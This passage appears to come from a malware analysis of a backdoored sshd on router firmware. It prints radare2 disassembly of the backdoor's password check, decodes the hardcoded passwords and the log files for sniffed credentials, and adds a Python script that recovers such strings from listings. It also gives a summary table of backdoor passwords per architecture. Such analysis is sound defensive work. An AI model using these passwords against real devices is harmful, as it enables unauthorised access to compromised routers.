           0x08051fe5      c6059dc20b08.  mov byte [obj.ILOG], 0x2f   ; [0x80bc29d:1]=58 LEA obj.ILOG ; ":" @ 0x80bc29d
           0x08051fec      c605a3c20b08.  mov byte [0x80bc2a3], 0x70  ; [0x80bc2a3:1]=0
           0x08051ff3      c6059ec20b08.  mov byte [0x80bc29e], 0x65  ; [0x80bc29e:1]=0
           0x08051ffa      c605a2c20b08.  mov byte [0x80bc2a2], 0x6c  ; [0x80bc2a2:1]=29
           0x08052001      c6059fc20b08.  mov byte [0x80bc29f], 0x74  ; [0x80bc29f:1]=0
           0x08052008      c605a9c20b08.  mov byte [0x80bc2a9], 0     ; [0x80bc2a9:1]=1
           0x0805200f      c605a1c20b08.  mov byte [0x80bc2a1], 0x2f  ; [0x80bc2a1:1]=8
           0x08052016      c605a6c20b08.  mov byte [0x80bc2a6], 0x6c  ; [0x80bc2a6:1]=75
           0x0805201d      c605a8c20b08.  mov byte [0x80bc2a8], 0x73  ; [0x80bc2a8:1]=1
           0x08052024      e8e7b3ffff     call sym.imp.strcmp
           0x08052029      85c0           test eax, eax
       ┌─< 0x0805202b      7533           jne 0x8052060
          0x0805202d      c70594900b08.  mov dword [obj.secret_ok], 1 ; [0x80b9094:4]=0x841c60d LEA obj.secret_ok ; obj.secret_ok
          0x08052037      b001           mov al, 1
          ; JMP XREF from 0x0805213b (sym.auth_password)
          ; JMP XREF from 0x08052112 (sym.auth_password)
     ┌┌──> 0x08052039      8b54243c       mov edx, dword [esp + local_3ch] ; [0x3c:4]=0x8048034 section_end.ehdr ; '<' ; "4...4..."
     │││   0x0805203d      653315140000.  xor edx, dword gs:[0x14]
    ┌────< 0x08052044      0f8576010000   jne 0x80521c0
    ││││   0x0805204a      8b5c244c       mov ebx, dword [esp + local_4ch] ; [0x4c:4]=5 ; 'L'
    ││││   0x0805204e      8b742450       mov esi, dword [esp + local_50h] ; [0x50:4]=4 ; 'P'
    ││││   0x08052052      8b7c2454       mov edi, dword [esp + local_54h] ; [0x54:4]=3 ; 'T'
    ││││   0x08052056      8b6c2458       mov ebp, dword [esp + local_58h] ; [0x58:4]=308 ; 'X' ; "4."
    ││││   0x0805205a      83c45c         add esp, 0x5c
    ││││   0x0805205d      c3             ret
     ││││   0x0805205e      6690           nop


In this case the password is GZm7HF, and the file is different as well: '/etc/lps/lps'


 Python 2.7.12 (default, Jun 29 2016, 14:05:02)
[GCC 4.2.1 Compatible Apple LLVM 7.3.0 (clang-703.0.31)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> "475a6d374846".decode("hex")
'GZm7HF'
>>> "2f6574632f6c70732f6c7073".decode("hex")
'/etc/lps/lps'
>>>


vyos64






            0x0040ba00      48896c24e0     mov qword [rsp - 0x20], rbp
           0x0040ba05      4889f5         mov rbp, rsi
           0x0040ba08      48895c24d8     mov qword [rsp - 0x28], rbx
           0x0040ba0d      4c896424e8     mov qword [rsp - 0x18], r12
           0x0040ba12      4c896c24f0     mov qword [rsp - 0x10], r13
           0x0040ba17      4889fb         mov rbx, rdi
           0x0040ba1a      4c897424f8     mov qword [rsp - 8], r14
           0x0040ba1f      be108b6700     mov esi, obj.SECRETPW       ; obj.SECRETPW
           0x0040ba24      4883ec38       sub rsp, 0x38
           0x0040ba28      448b670c       mov r12d, dword [rdi + 0xc] ; [0xc:4]=0
           0x0040ba2c      4c8b6f30       mov r13, qword [rdi + 0x30] ; [0x30:8]=0x38004000000000 ; '0'
           0x0040ba30      4889ef         mov rdi, rbp
           0x0040ba33      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=0x200470 ; '('
           0x0040ba3c      4889442408     mov qword [rsp + local_8h], rax
           0x0040ba41      31c0           xor eax, eax
           0x0040ba43      c605c6d02600.  mov byte [rip + 0x26d0c6], 0x47 ; [0x678b10:1]=178 LEA obj.SECRETPW ; obj.SECRETPW
           0x0040ba4a      c605c0d02600.  mov byte [rip + 0x26d0c0], 0x5a ; [0x678b11:1]=122
           0x0040ba51      c605bad02600.  mov byte [rip + 0x26d0ba], 0x6d ; [0x678b12:1]=64
           0x0040ba58      c605b4d02600.  mov byte [rip + 0x26d0b4], 0x37 ; [0x678b13:1]=0
           0x0040ba5f      c605aed02600.  mov byte [rip + 0x26d0ae], 0x48 ; [0x678b14:1]=0
           0x0040ba66      c605a8d02600.  mov byte [rip + 0x26d0a8], 0x46 ; [0x678b15:1]=0
           0x0040ba6d      c605a2d02600.  mov byte [rip + 0x26d0a2], 0 ; [0x678b16:1]=0
           0x0040ba74      c60574d12600.  mov byte [rip + 0x26d174], 0x70 ; [0x678bef:1]=0
           0x0040ba7b      c60566d12600.  mov byte [rip + 0x26d166], 0x63 ; [0x678be8:1]=165
           0x0040ba82      c60564d12600.  mov byte [rip + 0x26d164], 0x2f ; [0x678bed:1]=102
           0x0040ba89      c6055cd12600.  mov byte [rip + 0x26d15c], 0x73 ; [0x678bec:1]=10
           0x0040ba90      c6054ed12600.  mov byte [rip + 0x26d14e], 0x2f ; [0x678be5:1]=0 LEA obj.ILOG ; obj.ILOG
           0x0040ba97      c6054dd12600.  mov byte [rip + 0x26d14d], 0x70 ; [0x678beb:1]=0
           0x0040ba9e      c60541d12600.  mov byte [rip + 0x26d141], 0x65 ; [0x678be6:1]=0
           0x0040baa5      c6053ed12600.  mov byte [rip + 0x26d13e], 0x6c ; [0x678bea:1]=0
           0x0040baac      c60534d12600.  mov byte [rip + 0x26d134], 0x74 ; [0x678be7:1]=0
           0x0040bab3      c60537d12600.  mov byte [rip + 0x26d137], 0 ; [0x678bf1:1]=1
           0x0040baba      c60528d12600.  mov byte [rip + 0x26d128], 0x2f ; [0x678be9:1]=124
           0x0040bac1      c60526d12600.  mov byte [rip + 0x26d126], 0x6c ; [0x678bee:1]=0
           0x0040bac8      c60521d12600.  mov byte [rip + 0x26d121], 0x73 ; [0x678bf0:1]=54
           0x0040bacf      e86cb4ffff     call sym.imp.strcmp
           0x0040bad4      85c0           test eax, eax
       ┌─< 0x0040bad6      7548           jne 0x40bb20
          0x0040bad8      c70586722600.  mov dword [rip + 0x267286], 1 ; [0x672d68:4]=0x784 LEA obj.secret_ok ; obj.secret_ok
          0x0040bae2      b001           mov al, 1
          ; JMP XREF from 0x0040bbec (sym.userauth_none)
          ; JMP XREF from 0x0040bbc5 (sym.userauth_none)
     ┌┌──> 0x0040bae4      488b542408     mov rdx, qword [rsp + local_8h] ; [0x8:8]=0
     │││   0x0040bae9      644833142528.  xor rdx, qword fs:[0x28]
    ┌────< 0x0040baf2      0f8578010000   jne 0x40bc70
    ││││   0x0040baf8      488b5c2410     mov rbx, qword [rsp + local_10h] ; [0x10:8]=0x1003e0002
    ││││   0x0040bafd      488b6c2418     mov rbp, qword [rsp + local_18h] ; [0x18:8]=0x40a234 sym._start
    ││││   0x0040bb02      4c8b642420     mov r12, qword [rsp + local_20h] ; [0x20:8]=64 ; "@" 0x00000020
    ││││   0x0040bb07      4c8b6c2428     mov r13, qword [rsp + local_28h] ; [0x28:8]=0x200470 ; '('
    ││││   0x0040bb0c      4c8b742430     mov r14, qword [rsp + local_30h] ; [0x30:8]=0x38004000000000 ; '0'
    ││││   0x0040bb11      4883c438       add rsp, 0x38


In this case the password is GZm7HF as well, and the file is '/etc/lps/lps' too.


edgeos (MIPS)






│││      ; XREFS: CALL 0x0040b7fc  CALL 0x00425314  CALL 0x0040bacc  CALL 0x004249ec  CALL 0x00424c24  CALL 0x00425030
 ││││      ; XREFS: CALL 0x0040ba10  CALL 0x0040b9e0  CALL 0x0040baac  CALL 0x0041eb28
 ────────> 0x0040a224      b0ffbd27       addiu sp, sp, -0x50
 ││││      0x0040a228      3800b2af       sw s2, 0x38(sp)
 ││││      0x0040a22c      4800123c       lui s2, 0x48
 ││││      0x0040a230      00a04b8e       lw t3, -0x6000(s2)
 ││││      0x0040a234      48000a3c       lui t2, 0x48
 ││││      0x0040a238      2c00abaf       sw t3, 0x2c(sp)
 ││││      0x0040a23c      47000b24       addiu t3, zero, 0x47
 ││││      0x0040a240      b89f4225       addiu v0, t2, -0x6048
 ││││      0x0040a244      b89f4ba1       sb t3, -0x6048(t2)
 ││││      0x0040a248      5a000a24       addiu t2, zero, 0x5a
 ││││      0x0040a24c      4800b6af       sw s6, 0x48(sp)
 ││││      0x0040a250      3c00b3af       sw s3, 0x3c(sp)
 ││││      0x0040a254      3400b1af       sw s1, 0x34(sp)
 ││││      0x0040a258      3000b0af       sw s0, 0x30(sp)
 ││││      0x0040a25c      4c00bfaf       sw ra, 0x4c(sp)
 ││││      0x0040a260      4400b5af       sw s5, 0x44(sp)
 ││││      0x0040a264      4000b4af       sw s4, 0x40(sp)
 ││││      0x0040a268      01004aa0       sb t2, 1(v0)
 ││││      0x0040a26c      6d000a24       addiu t2, zero, 0x6d
 ││││      0x0040a270      02004aa0       sb t2, 2(v0)
 ││││      0x0040a274      37000a24       addiu t2, zero, 0x37
 ││││      0x0040a278      03004aa0       sb t2, 3(v0)
 ││││      0x0040a27c      48000a24       addiu t2, zero, 0x48
 ││││      0x0040a280      4800093c       lui t1, 0x48
 ││││      0x0040a284      21808000       move s0, a0
 ││││      0x0040a288      04004aa0       sb t2, 4(v0)
 ││││      0x0040a28c      46000a24       addiu t2, zero, 0x46
 ││││      0x0040a290      0c00148e       lw s4, 0xc(s0)
 ││││      0x0040a294      48e83625       addiu s6, t1, -0x17b8
 ││││      0x0040a298      2120a000       move a0, a1
 ││││      0x0040a29c      05004aa0       sb t2, 5(v0)
 ││││      0x0040a2a0      060040a0       sb zero, 6(v0)
 ││││      0x0040a2a4      2188a000       move s1, a1
 ││││      0x0040a2a8      21284000       move a1, v0
 ││││      0x0040a2ac      63000224       addiu v0, zero, 0x63
 ││││      0x0040a2b0      0300c2a2       sb v0, 3(s6)
 ││││      0x0040a2b4      65000224       addiu v0, zero, 0x65
 ││││      0x0040a2b8      2f000324       addiu v1, zero, 0x2f
 ││││      0x0040a2bc      70000824       addiu t0, zero, 0x70
 ││││      0x0040a2c0      73000624       addiu a2, zero, 0x73
 ││││      0x0040a2c4      6c000724       addiu a3, zero, 0x6c
 ││││      0x0040a2c8      0100c2a2       sb v0, 1(s6)
 ││││      0x0040a2cc      74000224       addiu v0, zero, 0x74
 ││││      0x0040a2d0      0a00c8a2       sb t0, 0xa(s6)
 ││││      0x0040a2d4      0800c3a2       sb v1, 8(s6)
 ││││      0x0040a2d8      0700c6a2       sb a2, 7(s6)
 ││││      0x0040a2dc      0600c8a2       sb t0, 6(s6)
 ││││      0x0040a2e0      0500c7a2       sb a3, 5(s6)
 ││││      0x0040a2e4      0200c2a2       sb v0, 2(s6)
 ││││      0x0040a2e8      0c00c0a2       sb zero, 0xc(s6)
 ││││      0x0040a2ec      0400c3a2       sb v1, 4(s6)
 ││││      0x0040a2f0      0900c7a2       sb a3, 9(s6)
 ││││      0x0040a2f4      0b00c6a2       sb a2, 0xb(s6)
 ││││      0x0040a2f8      5015100c       jal fcn.00405540
 ││││      0x0040a2fc      48e823a1       sb v1, -0x17b8(t1)
 ────────< 0x0040a300      12004014       bnez v0, 0x40a34c
 ││││      0x0040a304      2800138e       lw s3, 0x28(s0)
 ││││      0x0040a308      4800023c       lui v0, 0x48
 ││││      0x0040a30c      01000324       addiu v1, zero, 1
 ││││      0x0040a310      ac9f43ac       sw v1, -0x6054(v0)
 ││││      0x0040a314      01000224       addiu v0, zero, 1

The password and the file are the same as for Vyos/Vyos64.


edgeos64 (MIPS)


Radare doesn't seem to work with this MIPS 64 file.



As a summary, the backdoor passwords are:

ARMv7 / ARMv6 = PRtest0
Vyos / Vyos64 = GZm7HF
Default = PRtestD
edgeos = PRtest0
edgeos64 = ??????

The files with the sniffed accounts are:

ARMv7 / ARMv6 = /etc/X11/.pr
Vyos / Vyos64 = /etc/lps/lps
Default = /etc/X11/.pr
edgeos = /etc/lps/lps
edgeos64 = ???
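Reading the password and the log path off each listing by hand, as done above for every architecture, can be automated. The following is an added example, not code from the post: a small Python script that replays the immediate stores in a radare2 listing (ARM/Thumb strb, MIPS sb, x86/x86-64 mov byte) and rebuilds the strings written into obj.SECRETPW and obj.ILOG. The embedded excerpts are taken from the ARMv6 and Vyos listings above. The register model (immediates, pc-relative loads, lui/addiu, register copies) is my own minimal one, not radare2's; a byte stored from a register whose value is not visible in the excerpt is printed as '?' rather than guessed, which is exactly what happens with r7 in the ARMv7 listing.

```python
"""Rebuild strings that sshd assembles at run time from byte-by-byte immediate
stores, straight from a radare2 listing (ARM/Thumb, MIPS, x86 and x86-64).

Added example, not code from the post: it automates the reading-off done by hand
above for obj.SECRETPW and obj.ILOG. The register model is a deliberately minimal
one of my own (immediates, pc-relative loads, lui/addiu, register copies).
"""
import re

# x86/x86-64: immediate in the instruction, absolute address in radare's comment
X86_STORE = re.compile(r"mov byte \[[^\]]+\],\s*(?P<val>0x[0-9a-f]+|\d+)\s*;\s*\[(?P<addr>0x[0-9a-f]+):1\]")
LEA_SYM = re.compile(r"LEA obj\.(?P<sym>\w+)")
# ARM/MIPS: immediates and pointers go through registers; strb/sb then store them
ARM_IMM = re.compile(r"\bmov(?:s|\.w)?\s+(?P<rd>\w+),\s*(?P<val>0x[0-9a-f]+|\d+)\b")
ARM_PCLDR = re.compile(r"\bldr(?:\.w)?\s+(?P<rd>\w+),\s*\[pc,.*?obj\.(?P<sym>\w+)")
ARM_STRB = re.compile(r"\bstrb(?:\.w)?\s+(?P<rs>\w+),\s*\[(?P<base>\w+)(?:,\s*(?P<off>0x[0-9a-f]+|\d+))?\]")
MIPS_IMM = re.compile(r"\baddiu\s+(?P<rd>\w+),\s*zero,\s*(?P<val>-?0x[0-9a-f]+|-?\d+)")
MIPS_LUI = re.compile(r"\blui\s+(?P<rd>\w+),")
MIPS_ADDI = re.compile(r"\baddiu\s+(?P<rd>\w+),\s*(?P<rs>\w+),\s*(?P<imm>-?0x[0-9a-f]+|-?\d+)")
MIPS_SB = re.compile(r"\bsb\s+(?P<rs>\w+),\s*(?P<off>-?0x[0-9a-f]+|-?\d+)\((?P<base>\w+)\)")
REG_COPY = re.compile(r"\bmove?\s+(?P<rd>\w+),\s*(?P<rs>[a-z]\w*)\s*(?:;|$)")


def recover_strings(listing):
    """Map each string base (symbol name or synthetic root) to the text stored into it."""
    regs, bases, cells, x86_cells, x86_roots, nroots = {}, {}, {}, [], {}, 0

    def where(reg):  # (root, offset) the register points at; an untracked base keeps its name
        return bases.get(reg, (reg + "?", 0))

    for line in listing.splitlines():
        if m := X86_STORE.search(line):
            addr = int(m["addr"], 16)
            x86_cells.append((addr, int(m["val"], 0)))
            if s := LEA_SYM.search(line):
                x86_roots[addr] = s["sym"]
        elif m := ARM_PCLDR.search(line):
            regs.pop(m["rd"], None); bases[m["rd"]] = (m["sym"], 0)
        elif m := MIPS_LUI.search(line):
            nroots += 1
            regs.pop(m["rd"], None); bases[m["rd"]] = (f"{m['rd']}#{nroots}", 0)
        elif (m := MIPS_IMM.search(line)) or (m := ARM_IMM.search(line)):
            bases.pop(m["rd"], None); regs[m["rd"]] = int(m["val"], 0)
        elif m := MIPS_ADDI.search(line):
            root, off = where(m["rs"])
            regs.pop(m["rd"], None); bases[m["rd"]] = (root, off + int(m["imm"], 0))
        elif m := REG_COPY.search(line):
            rd, rs = m["rd"], m["rs"]
            regs.pop(rd, None); bases.pop(rd, None)
            if rs in regs: regs[rd] = regs[rs]
            if rs in bases: bases[rd] = bases[rs]
        elif (m := ARM_STRB.search(line)) or (m := MIPS_SB.search(line)):
            root, off = where(m["base"])
            val = 0 if m["rs"] == "zero" else regs.get(m["rs"])  # None = value not visible
            cells[(root, off + int(m["off"] or "0", 0))] = val
    for addr, val in x86_cells:  # attach each x86 byte to the nearest LEA-labelled symbol below it
        anchors = [a for a in x86_roots if a <= addr]
        key = (x86_roots[max(anchors)], addr - max(anchors)) if anchors else ("mem", addr)
        cells[key] = val
    return render(cells)


def render(cells):
    """Join bytes per base in address order; '?' marks a byte never seen, NUL ends the string."""
    out = {}
    for root in sorted({r for r, _ in cells}):
        offs = [o for r, o in cells if r == root]
        text = ""
        for o in range(min(offs), max(offs) + 1):
            v = cells.get((root, o))
            if v == 0:
                break
            text += "?" if v is None else chr(v)
        out[root] = text
    return out


# Excerpt of the ARMv6 auth_password listing above (the SECRETPW stores only)
ARMV6_EXCERPT = """
0x00012364      60329fe5       ldr r3, [pc, 0x260]         ; [0x125cc:4]=0x79268 obj.SECRETPW
0x00012378      50a0a0e3       mov sl, 0x50                ; 'P'
0x0001237c      00a0c3e5       strb sl, [r3]
0x00012380      52a0a0e3       mov sl, 0x52                ; 'R'
0x00012384      01a0c3e5       strb sl, [r3, 1]
0x00012388      73a0a0e3       mov sl, 0x73                ; 's'
0x0001238c      74c0a0e3       mov ip, 0x74                ; 't'
0x00012390      65e0a0e3       mov lr, 0x65                ; 'e'
0x00012394      04a0c3e5       strb sl, [r3, 4]
0x00012398      30a0a0e3       mov sl, 0x30                ; '0'
0x000123a4      06a0c3e5       strb sl, [r3, 6]
0x000123a8      02c0c3e5       strb ip, [r3, 2]
0x000123ac      03e0c3e5       strb lr, [r3, 3]
0x000123b0      05c0c3e5       strb ip, [r3, 5]
"""
# Excerpt of the Vyos (x86) listing above
VYOS_EXCERPT = """
0x08051f98      c605d0c10b08.  mov byte [obj.SECRETPW], 0x47 ; [0x80bc1d0:1]=0 LEA obj.SECRETPW ; obj.SECRETPW
0x08051f9f      c605d1c10b08.  mov byte [0x80bc1d1], 0x5a  ; [0x80bc1d1:1]=1
0x08051fa6      c605d2c10b08.  mov byte [0x80bc1d2], 0x6d  ; [0x80bc1d2:1]=147
0x08051fad      c605d3c10b08.  mov byte [0x80bc1d3], 0x37  ; [0x80bc1d3:1]=1
0x08051fb4      c605d4c10b08.  mov byte [0x80bc1d4], 0x48  ; [0x80bc1d4:1]=116
0x08051fbb      c605d5c10b08.  mov byte [0x80bc1d5], 0x46  ; [0x80bc1d5:1]=0
0x08051fc2      c605d6c10b08.  mov byte [0x80bc1d6], 0     ; [0x80bc1d6:1]=0
"""

if __name__ == "__main__":
    for name, text in (("ARMv6", ARMV6_EXCERPT), ("Vyos x86", VYOS_EXCERPT)):
        print(name, recover_strings(text))
```

Feeding it the whole `pdf @ sym.auth_password` output of each binary gives both strings at once (the ILOG path comes out alongside SECRETPW), and the '?' markers make it obvious when the listing window was cut too short to see every register load, rather than producing a plausible but wrong password.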